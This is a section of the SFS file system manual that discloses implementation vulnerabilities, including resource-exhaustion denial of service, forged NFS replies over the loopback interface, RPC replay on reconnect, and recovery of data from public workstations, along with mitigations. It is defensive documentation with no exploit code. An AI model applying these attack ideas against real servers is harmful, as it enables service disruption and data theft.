Node:implementation vulnerabilities, Previous:exposed vulnerabilities, Up:Security
The best way to attack the SFS software is probably to cause resource exhaustion. You can try to run SFS out of file descriptors, memory, CPU time, or mount points.
An attacker can run a server out of file descriptors by opening many
parallel TCP connections. Such attacks can be detected using the
netstat
command to see who is connecting to SFS (which accepts
connections on port 4). Users can run the client (also
sfsauthd
) out of descriptors by connecting many times using
the setgid program
/usr/local/lib/sfs-0.6/suidconnect
. These attacks
can be traced using a tool like lsof, available from
ftp://vic.cc.purdue.edu/pub/tools/unix/lsof.
SFS enforces a maximum size of just over 64 K on all RPC requests. Nonetheless, a client could connect 1000 times, on each connection send the first 64 K of a slightly larger message, and just sit there. That would obviously consume about 64 Megabytes of memory, as SFS will wait patiently for the rest of the request.
A worse problem is that SFS servers do not currently flow-control clients. Thus, an attacker could make many RPCs but not read the replies, causing the SFS server to buffer arbitrarily much data and run out of memory. (Obviously the server eventually flushes any buffered data when the TCP connection closes.)
Connecting to an SFS server costs the server tens of milliseconds of CPU time. An attacker can try to burn a huge amount of the server's CPU time by connecting to the server many times. The effects of such attacks can be mitigated using hashcash, HashCost.
Finally, a user on a client can cause a large number of file systems to be mounted. If the operating system has a limit on the number of mount points, a user could run the client out of mount points.
If a TCP connection is reset, the SFS client will attempt to reconnect
to the server and retransmit whatever RPCs were pending at the time the
connection dropped. Not all NFS RPCs are idempotent however. Thus, an
attacker who caused a connection to reset at just the right time could,
for instance, cause a mkdir
command to return EEXIST
when in fact it did just create the directory.
SFS exchanges NFS traffic with the local operating system using the loopback interface. An attacker with physical access to the local ethernet may be able to inject arbitrary packets into a machine, including packets to 127.0.0.1. Without packet filtering in place, an attacker can also send packets from anywhere making them appear to come from 127.0.0.1.
On the client, an attacker can forge NFS requests from the kernel to SFS, or forge replies from SFS to the kernel. The SFS client encrypts file handles before giving them to the operating system. Thus, the attacker is unlikely to be able to forge a request from the kernel to SFS that contain a valid file handle. In the other direction however, the reply does not need to contain a file handle. The attacker may well be able to convince the kernel of a forged reply from SFS. The attacker only needs to guess a (possibly quite predictable) 32-bit RPC XID number. Such an attack could result, for example, in a user getting the wrong data when reading a file.
On the server side, you also must assume the attacker cannot guess a valid NFS file handle (otherwise, you already have no security--see NFS security). However, the attacker might again forge NFS replies, this time from the kernel to the SFS server software.
To prevent such attacks, if your operating system has IP filtering, it would be a good idea to block any packets either from or to 127.0.0.1 if those packets do not come from the loopback interface. Blocking traffic "from" 127.0.0.1 at your firewall is also a good idea.
On BSD-based systems (and possibly others) the buffer reclaiming policy can cause deadlock. When an operation needs a buffer and there are no clean buffers available, the kernel picks some particular dirty buffer and won't let the operation complete until it can get that buffer. This can lead to deadlock in the case that two machines mount each other.
An attacker may be able to read the contents of a private file shortly after you log out of a public workstation if the he can then become root on the workstation. There are two attacks possible.
First, the attacker may be able to read data out of physical memory or
from the swap partition of the local disk. File data may still be in
memory if the kernel's NFS3 code has cached it in the buffer cache.
There may also be fragments of file data in the memory of the
sfsrwcd
process, or out on disk in the swap partition (though
sfsrwcd
does its best to avoid getting paged out). The
attacker can read any remaining file contents once he gains control of
the machine.
Alternatively, the attacker may have recorded encrypted session traffic
between the client and server. Once he gains control of the client
machine, he can attach to the sfsrwcd
process with the
debugger and learn the session key if the session is still open. This
will let him read the session he recorded in encrypted form.
To minimize the risks of these attacks, you must kill and restart
sfscd
before turning control of a public workstation over to
another user. Even this is not guaranteed to fix the problem. It will
flush file blocks from the buffer cache by unmounting all file systems,
for example, but the contents of those blocks may persist as
uninitialized data in buffers sitting on the free list. Similarly, any
programs you ran that manipulated private file data may have gotten
paged out to disk, and the information may live on after the processes
exit.
In conclusion, if you are paranoid, it is best not to use public workstations.
SFS does its best to disable setuid programs and devices on remote file servers it mounts. However, we have only tested this on operating systems we have access to. When porting SFS to new platforms, It is worth testing that both setuid programs and devices do not work over SFS. Otherwise, any user of an SFS client can become root.